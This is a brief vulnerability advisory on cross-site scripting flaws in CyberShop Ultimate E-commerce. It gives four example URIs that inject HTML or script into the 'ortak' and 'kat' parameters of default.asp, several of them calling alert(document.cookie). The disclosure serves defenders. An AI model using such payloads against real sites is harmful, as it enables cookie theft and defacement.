CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities

CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities

An exploit is not required.

Example URI have been provided:

http://www.example.com/default.asp?gb=urun&id=18&ortak="<h1>Patriotic%20Hackers<h1>

http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.cookie</script>&ortak=

http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.title)</script>&ortak=

http://www.example.com/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script>